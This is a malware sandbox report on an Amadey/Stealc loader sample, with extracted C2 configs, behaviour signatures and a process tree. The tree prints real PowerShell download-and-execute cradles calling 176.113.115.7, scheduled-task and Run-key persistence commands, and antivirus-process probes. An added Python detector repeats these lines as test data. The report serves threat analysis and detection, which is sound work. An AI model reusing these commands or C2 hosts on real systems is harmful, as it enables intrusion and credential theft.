Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64
    arch:x86
    image:win7-20240903-en
    locale:en-us
    os:windows7-x64
    system
  • submitted
    26/03/2025, 20:36

General

  • Target

    2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    6dd7b93ac51efcb83123e106cf6fffff

  • SHA1

    445c23a47afe65806c0180d43217cdab9927b203

  • SHA256

    221ec52b5b50595fbaf95e8db9137a053f7f1b362e8c62550512393566a69085

  • SHA512

    bc58395c0949d98c1e8737e8d9414d159e8ba6333989f3258acf0852a83e4d99f1f3e2b941290990f4029121215b9811c7fa1f34795253e6e3caca4059844572

  • SSDEEP

    24576:+qDEvCTbMWu7rQYlBQcBiT6rprG8a4Qu:+TvC/MTQYxsWR7a4Q

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • NetSupport

    NetSupport is a remote access tool sold as legitimate system administration software.

  • Netsupport family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Executes commands through powershell.exe.

  • Downloads MZ/PE file 12 IoCs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 25 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 56 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 52 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of FindShellTrayWindow 17 IoCs
  • Suspicious use of SendNotifyMessage 15 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
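The PowerShell, mshta, schtasks, tasklist/findstr and Run-key signatures above are driven by the command lines captured in the process tree below. As an added example (not part of this report and not any vendor's detection code), the Python below applies four small rules to those command lines and also resolves where the PowerShell download cradle actually writes its file. The sandbox TEMP path, the rule names and the sample event list are assumptions; the security-product process names are simply the ones the batch stage greps for.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Sandbox %TEMP% for the "Admin" user seen in this report (assumed from the
# dropped-file paths; adjust for another host).
TEMP_DIR = r"C:\Users\Admin\AppData\Local\Temp"

# Process names the batch stage greps for with findstr. Taken from the
# captured findstr command lines, not from a vendor list.
SECURITY_PROCESS_NAMES = {"opssvc", "wrsa", "sophoshealth", "bdservicehost",
                          "avastui", "avgui", "nswscsvc", "ekrn"}

# Constructed sample events (pid, command line). The command lines are copied
# from the process tree in this report; "tasklist" is a benign control.
SAMPLE_EVENTS = [
    (2252, r'''schtasks /create /tn KJ5oymaWQTT /tr "mshta C:\Users\Admin\AppData\Local\Temp\4EqD5DME5.hta" /sc minute /mo 25 /ru "Admin" /f'''),
    (2456, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'K2ZIS9NI4WK9GWZFWKPYVBSRCLG6TSLY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;'''),
    (2204, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;'''),
    (2424, r'''findstr /I "opssvc wrsa"'''),
    (1552, r'''findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"'''),
    (2828, r'''REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"'''),
    (2536, "tasklist"),
]

# $var=$env:temp+'NAME'; ... DownloadFile('http://...',$var)
CRADLE = re.compile(
    r"\$(?P<var>\w+)=\$env:temp\+'(?P<name>[^']+)';.*?"
    r"DownloadFile\('(?P<url>https?://[^']+)',\$(?P=var)\)", re.IGNORECASE)
HIDDEN = re.compile(r"-windowstyle\s+hidden", re.IGNORECASE)
SCHTASK_HTA = re.compile(r'schtasks\s+/create\b.*?/tr\s+"(?P<action>[^"]*mshta[^"]*)"', re.IGNORECASE)
FINDSTR = re.compile(r'\bfindstr\b(?:\s+/\w+)*\s+"(?P<pat>[^"]+)"', re.IGNORECASE)
RUNKEY = re.compile(r'\breg\s+add\s+"?(?P<key>[^"\s]*\\CurrentVersion\\Run)"?.*?/d\s+"(?P<target>[^"]+)"',
                    re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def effective_drop_path(temp_dir: str, literal: str) -> str:
    # PowerShell string '+' inserts no separator. A literal that does not start
    # with a backslash therefore lands BESIDE %TEMP% (...\Local\TempNAME.EXE),
    # which is exactly the odd path the process tree shows for PID 2520.
    return temp_dir + literal


def analyse(pid: int, cmd: str) -> list[Finding]:
    out: list[Finding] = []
    m = CRADLE.search(cmd)
    if m and HIDDEN.search(cmd):
        path = effective_drop_path(TEMP_DIR, m["name"])
        where = "inside" if m["name"].startswith("\\") else "BESIDE"
        out.append(Finding(pid, "powershell_download_cradle", f"{m['url']} -> {path} ({where} %TEMP%)"))
    m = SCHTASK_HTA.search(cmd)
    if m:
        out.append(Finding(pid, "schtasks_mshta_hta", m["action"]))
    m = FINDSTR.search(cmd)
    if m:
        hits = sorted({tok.lower() for tok in m["pat"].split()} & SECURITY_PROCESS_NAMES)
        if hits:
            out.append(Finding(pid, "av_process_probe", " ".join(hits)))
    m = RUNKEY.search(cmd)
    if m:
        target = m["target"].lower()
        if target.startswith("c:\\users\\public") or "\\appdata\\" in target:
            out.append(Finding(pid, "run_key_user_writable_target", m["target"]))
    return out


def scan(events: list[tuple[int, str]]) -> list[Finding]:
    return [f for pid, cmd in events for f in analyse(pid, cmd)]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.pid:>5}  {f.rule:<30} {f.detail}")
```

The drop-path step is the part worth keeping: the first two cradles concatenate `$env:temp` with a bare file name, so the report shows the payload at C:\Users\Admin\AppData\Local\TempK2ZIS....EXE rather than in the Temp folder; only the third cradle (`'\483d...exe'`) writes inside it. A file-path allowlist that trusts "anything not under Temp" would miss the first two.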

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1128
      • C:\Users\Admin\AppData\Local\Temp\2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
        "C:\Users\Admin\AppData\Local\Temp\2025-03-26_6dd7b93ac51efcb83123e106cf6fffff_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
        2⤵
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2484
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn KJ5oymaWQTT /tr "mshta C:\Users\Admin\AppData\Local\Temp\4EqD5DME5.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1872
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn KJ5oymaWQTT /tr "mshta C:\Users\Admin\AppData\Local\Temp\4EqD5DME5.hta" /sc minute /mo 25 /ru "Admin" /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2252
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\4EqD5DME5.hta
          3⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:2288
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'K2ZIS9NI4WK9GWZFWKPYVBSRCLG6TSLY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2456
            • C:\Users\Admin\AppData\Local\TempK2ZIS9NI4WK9GWZFWKPYVBSRCLG6TSLY.EXE
              "C:\Users\Admin\AppData\Local\TempK2ZIS9NI4WK9GWZFWKPYVBSRCLG6TSLY.EXE"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:2520
              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Downloads MZ/PE file
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Loads dropped DLL
                • Adds Run key to start application
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:2788
                • C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2256
                • C:\Users\Admin\AppData\Local\Temp\10343420101\kZZeUXM.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343420101\kZZeUXM.exe"
                  7⤵
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  PID:2028
                • C:\Users\Admin\AppData\Local\Temp\10343460101\kZZeUXM.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343460101\kZZeUXM.exe"
                  7⤵
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  PID:1984
                • C:\Users\Admin\AppData\Local\Temp\10343470101\kDveTWY.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343470101\kDveTWY.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2920
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 2920 -s 36
                    8⤵
                    • Loads dropped DLL
                    PID:2360
                • C:\Users\Admin\AppData\Local\Temp\10343480101\a6eddbd478.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343480101\a6eddbd478.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:1632
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 1632 -s 64
                    8⤵
                    • Loads dropped DLL
                    PID:816
                • C:\Users\Admin\AppData\Local\Temp\10343490101\dBSGwVB.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343490101\dBSGwVB.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2372
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\Users\Public\Netstat\netsup.bat" "
                    8⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:1864
                    • C:\Windows\SysWOW64\reg.exe
                      REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                      9⤵
                      • Adds Run key to start application
                      PID:2828
                    • C:\Users\Public\Netstat\bild.exe
                      C:\Users\Public\Netstat\bild.exe
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      PID:2812
                • C:\Users\Admin\AppData\Local\Temp\10343500101\WLbfHbp.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343500101\WLbfHbp.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  PID:2752
                  • C:\Windows\SysWOW64\CMD.exe
                    "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                    8⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:2056
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2536
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "opssvc wrsa"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2424
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2520
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1552
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 267978
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1708
                    • C:\Windows\SysWOW64\extrac32.exe
                      extrac32 /Y /E Spanish.vss
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1196
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /V "East" Removed
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2368
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1704
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1556
                    • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                      Exam.com j
                      9⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:2948
                    • C:\Windows\SysWOW64\choice.exe
                      choice /d y /t 5
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1836
                • C:\Users\Admin\AppData\Local\Temp\10343510101\f73ae_003.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343510101\f73ae_003.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1872
                • C:\Users\Admin\AppData\Local\Temp\10343520101\TbV75ZR.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343520101\TbV75ZR.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:1456
                  • C:\Windows\SysWOW64\CMD.exe
                    "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                    8⤵
                    • Loads dropped DLL
                    PID:2108
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2052
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "opssvc wrsa"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2404
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1528
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2800
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 267978
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1400
                    • C:\Windows\SysWOW64\extrac32.exe
                      extrac32 /Y /E Spanish.vss
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2400
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2744
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2524
                    • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                      Exam.com j
                      9⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:1664
                    • C:\Windows\SysWOW64\choice.exe
                      choice /d y /t 5
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1884
                • C:\Users\Admin\AppData\Local\Temp\10343530101\7IIl2eE.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343530101\7IIl2eE.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:2656
                  • C:\Windows\SysWOW64\CMD.exe
                    "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                    8⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:2292
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3052
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "opssvc wrsa"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2360
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:328
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2740
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 418377
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2588
                    • C:\Windows\SysWOW64\extrac32.exe
                      extrac32 /Y /E Leon.cab
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:924
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /V "BEVERAGES" Compilation
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2796
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2424
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1672
                    • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                      Passwords.com N
                      9⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:1188
                    • C:\Windows\SysWOW64\choice.exe
                      choice /d y /t 5
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2828
                • C:\Users\Admin\AppData\Local\Temp\10343540101\BIm18E9.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343540101\BIm18E9.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:556
                • C:\Users\Admin\AppData\Local\Temp\10343550101\oalJJxv.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343550101\oalJJxv.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2108
                • C:\Users\Admin\AppData\Local\Temp\10343560101\3c3eab273a.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343560101\3c3eab273a.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:1400
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c schtasks /create /tn oR8jzmakWek /tr "mshta C:\Users\Admin\AppData\Local\Temp\KVADJhQTS.hta" /sc minute /mo 25 /ru "Admin" /f
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:1460
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /tn oR8jzmakWek /tr "mshta C:\Users\Admin\AppData\Local\Temp\KVADJhQTS.hta" /sc minute /mo 25 /ru "Admin" /f
                      9⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:1428
                  • C:\Windows\SysWOW64\mshta.exe
                    mshta C:\Users\Admin\AppData\Local\Temp\KVADJhQTS.hta
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies Internet Explorer settings
                    PID:2168
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VMXBMBSZWYUUGUJD1ZASCVZIQHEB1V3N.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                      9⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Downloads MZ/PE file
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2468
                      • C:\Users\Admin\AppData\Local\TempVMXBMBSZWYUUGUJD1ZASCVZIQHEB1V3N.EXE
                        "C:\Users\Admin\AppData\Local\TempVMXBMBSZWYUUGUJD1ZASCVZIQHEB1V3N.EXE"
                        10⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:868
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\10343570121\am_no.cmd" "
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2684
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 2
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Delays execution with timeout.exe
                    PID:1732
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                    8⤵
                    PID:1716
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1364
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2036
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2796
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2808
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2560
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /tn "NEvSemazeZB" /tr "mshta \"C:\Temp\aAnhrbTyJ.hta\"" /sc minute /mo 25 /ru "Admin" /f
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:1316
                  • C:\Windows\SysWOW64\mshta.exe
                    mshta "C:\Temp\aAnhrbTyJ.hta"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies Internet Explorer settings
                    PID:2860
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                      9⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Downloads MZ/PE file
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2204
                      • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                        10⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1008
                • C:\Users\Admin\AppData\Local\Temp\10343580101\22992d86cd.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343580101\22992d86cd.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
